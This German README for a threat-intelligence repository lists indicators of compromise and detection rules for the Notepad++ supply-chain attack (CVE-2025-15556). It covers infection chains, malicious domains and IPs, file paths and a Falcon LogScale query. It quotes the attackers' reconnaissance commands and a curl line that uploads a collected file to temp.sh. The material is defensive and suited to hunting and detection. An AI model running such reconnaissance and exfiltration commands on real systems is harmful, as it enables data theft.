
IoCs und Erkennungsregeln für den Notepad++ Supply-Chain-Angriff (CVE-2025-15556) — Lotus Blossom APT, Juni–Dezember 2025. Beinhaltet Falcon LogScale-Abfragen, YARA/Sigma-Regeln und MITRE ATT&CK Mapping.
CVE-2025-15556 | Lotus Blossom / Raspberry Typhoon | Juni – Dezember 2025
Dieses Repository enthält eine umfassende, konsolidierte Sammlung von Indikatoren für Kompromittierung (IoCs) im Zusammenhang mit dem Notepad++-Supply-Chain-Angriff, der am 2. Februar 2026 offengelegt wurde.
Zwischen Juni und Dezember 2025 kompromittierte ein chinesischer staatlich geförderter Bedrohungsakteur die Hosting-Infrastruktur von Notepad++, kaperte den integrierten Update-Mechanismus (WinGUp) und lieferte selektiv trojanisierte Installer an gezielte Benutzer aus. Der Angriff nutzte das Fehlen einer kryptografischen Prüfung im Updater (vor v8.8.9) aus und ermöglichte die Verteilung von individuellen Backdoors, Cobalt Strike Beacons und Metasploit-Payloads.
| CVE | CVE-2025-15556 — Herunterladen von Code ohne Integritätsprüfung |
| Bedrohungsakteur | Lotus Blossom (Bilbug, Raspberry Typhoon, Thrip) / Zirconium (Violet Typhoon) |
| Aktiver Zeitraum | Juni 2025 – 2. Dezember 2025 |
| Angriffsvektor | Supply-Chain-Kompromittierung über den WinGUp-Autoupdater |
| Ziele | Regierung, Telekommunikation, Finanzdienstleistungen, IT-Dienstleister (Philippinen, Vietnam, El Salvador, Australien, Ostasien) |
| Malware | Chrysalis-Backdoor (eigen entwickelt), Cobalt Strike Beacon, Metasploit Meterpreter |
| Behoben in | Notepad++ v8.8.9+ (Zertifikatsprüfung) / v8.9.1+ (XMLDSig-Validierung) |
Kaspersky GReAT identifizierte drei unterschiedliche Infektionsketten, die etwa monatlich rotiert wurden, um der Erkennung zu entgehen:
GUP.exe → update.exe (NSIS) → ProShow.exe (legitim) → Exploit über „load"-Datei
→ Metasploit-Downloader → Cobalt Strike Beacon
whoami && tasklist → exfiltriert über temp.sh%appdata%\ProShow\GUP.exe → update.exe (NSIS) → script.exe (Lua-Interpreter) → alien.ini (kompiliertes Lua)
→ Shellcode über EnumWindowStationsW → Metasploit-Downloader → Cobalt Strike Beacon
whoami && tasklist && systeminfo && netstat -ano%appdata%\Adobe\Scripts\GUP.exe → update.exe (NSIS) → BluetoothService.exe (legitim) → log.dll (gesideloadet)
→ entschlüsselt „BluetoothService"-Shellcode → Chrysalis-Backdoor
%appdata%\Bluetooth\C:\ProgramData\USOShared\ ┌─────────────────────────────────────────────────────────┐
│ KOMPROMITTIERUNGS-ZEITSTRAHL │
├─────────┬─────────┬─────────┬─────────┬─────────┬──────┤
│ Jul 25 │ Aug 25 │ Sep 25 │ Okt 25 │ Nov 25 │Dez 25│
├─────────┴─────────┴─────────┴─────────┴─────────┴──────┤
Kette #1 (ProShow) │████████████████████ │
Kette #2 (Lua) │ █████████████████████████████ │
Kette #3 (DLL SL) │ ██████████████ │
Infra-Zugriff │████████████████████████████████████████████████████████│
└────────────────────────────────────────────────────────┘
| Datei | Beschreibung |
|---|---|
notepadpp_supply_chain_iocs.csv | Vollständiger IoC-Datensatz (105 Indikatoren) mit MITRE ATT&CK-Zuordnung |
| Spalte | Beschreibung |
|---|---|
ioc_type | Typ: ip, domain, url, sha1, sha256, filepath, filename, useragent, behavior, cve, attribution, compromise_window |
ioc_value | Der Indikatorwert |
chain | Infektionskette (1, 2, 3, 1/2, 2/3, all, n/a) |
context | Beschreibung, wofür der IoC steht |
source | Nachrichtenquelle (Kaspersky, Rapid7, CrowdStrike, Tenable, Kevin Beaumont) |
risk | Schweregrad (CRITICAL, HIGH, MEDIUM, LOW, INFO) |
mitre_technique | MITRE ATT&CK-Technik-ID |
Verhaltensbasiert – IoC-agnostisch, höchster Wert:
gup.exe startet einen untergeordneten Prozess, der kein legitimer signierter Notepad++-Installer istgup.exe stellt Verbindungen zu Domains/IPs her, die nicht notepad-plus-plus.org, github.com, release-assets.githubusercontent.com sind%appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\%localappdata%\Temp\ns.tmp\ (NSIS-Laufzeit – in allen Ketten vorhanden)Netzwerk – hohe Zuversicht:
cdncheck.it.com, safe-dns.it.com, self-dns.it.com, api.skycloudcenter.com, api.wiresguard.comtemp.sh (51.91.79.17) – insbesondere mit Dateiupload über curltemp.sh-URLs im User-Agent-Header45.76.155.202, 45.32.144.255, 95.179.213.0, 45.77.31.210Aufklärungsbefehle (nach Exploitation):
cmd /c whoami&&tasklist > 1.txt
cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
curl -F "[email protected]" -s https://temp.sh/upload
#event_simpleName=ProcessRollup2 event_platform=Win ParentBaseFileName="gup.exe"
| FilePath=/\\Device\\HarddiskVolume\d+(?<shortFilePath>.+$)/
| groupBy([FileName, SHA256HashData, shortFilePath, CommandLine])